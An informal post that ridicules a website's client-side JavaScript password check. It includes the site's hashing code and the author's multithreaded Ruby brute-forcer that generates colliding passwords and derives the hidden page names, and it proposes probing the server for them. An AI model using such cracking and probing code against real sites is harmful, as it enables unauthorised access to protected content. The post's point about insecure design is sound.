Some peoples kids, you know? I found this little gem on some site somewhere. The data and names have been changed to protect the innocent
.
There are two parts to the form, the select drop down, as such:
<option value='Bobm|12345|ABCDEFGH'>BobmAnd the input field. The user selects the user from the drop down list, then types in their password and clicks the submit button. The form doesn't actually do anything as far as posting the data to a real, big boy kind of server script, instead it does some truly horrific things:
var alpha="ABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHI";
for (i=0;i<3;i++) {
a=choice.indexOf("|",p);
params[i]=choice.substring(a,p);
p=a+1;
}
h1=makehash(form.pass.value,3);
function makehash(pw,mult) {
pass=pw.toUpperCase();
hash=0;
for (i=0;i<8;i++) {
letter=pass.substring(i,i+1);
c=alpha.indexOf(letter,0)+1;
hash=hash*mult+c;
}
return(hash);
}
So the scripts creates a hash value based on user input. If the hash doesn't equal the value params[1] ( 12345 in this case ), then the password is wrong. However, if the hash does equal 12345, you get this:
h2=makehash(form.pass.value,10)+" ";
var page="";
for (var i=0;i<8;i++) {
letter=params[2].substring(i,i+1)
ul=letter.toUpperCase();
a=alpha.indexOf(ul,0);
a-=(h2.substring(i,i+1)*1);
if (a<0) a+=26;
page+=alpha.substring(a,a+1); };
top.location=page.toLowerCase()+".html";
}
So, if the password is "correct" then your redirected to a new page based on a bigger hash, and some other stuff. Being the person that I am I wanted to see how hard this kind of thing would be to crack. There is more to this, but here is the short version, minus the comments and db stuff:
@chars = []
"ABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHI".each_char do |c| @chars << c end
Key = 35892
PageKey = "MOMGFDPN"
Multiplier_Small = 3
Multiplier_Big = 10
def mkHash( str,multiplier )
hash = 0;
str.each_char do |letter|
hash = hash*multiplier + @chars.index(letter)+1
end
return hash;
end
def mkPage( str_key )
bigHash = mkHash( str_key,Multiplier_Big )
page = ""
8.times do |i|
a = ( @chars.index( PageKey[i,1] ).to_i() ) - ( (bigHash.to_s()[i,1]).to_i()*1 )
a += 26 if( a < 0 )
page << @chars[a]
end
return page.downcase()
end
NumBruteIterations = 100
NumThreads = 30
NumBruteRuns = 10000
NumBruteIterations.times do |i|
threads = []
NumThreads.times do
threads << Thread.new do
NumBruteRuns.times do |t|
str = ""
8.times do |i| str << @chars[rand(@chars.length)] end
if(mkHash( str,Multiplier_Small ) == Key)
if(!hashIsStored?( str ))
PtrStoreString.execute( str,mkPage(str) )
end
end
end
end
end
threads.each() do |t| t.join() end
endWith this I can generate around 20k keys per second. I store the strings that 'work', or hash out to 12345 in the db, along with the page value generated. At the time of this writing there are 24989 unique keys. The next obvious step would be to write another script that would hit the site checking for the generate page, if the server returns 404, then the page isn't the right page, however, if it returns 200, bing!
The kicker about this is that the user is storing both the hash algorithm, and the key in the same space both viewable by the user. This makes it possible to port the process back to a local resource and crack it on my own time without the user ever knowing what's going on. It's like...well... it's the dumbest fucking thing I've ever seen anyone do. The nut buster is that the user is running his site on an apache server. Five minutes and a .htaccess file would fix the problem.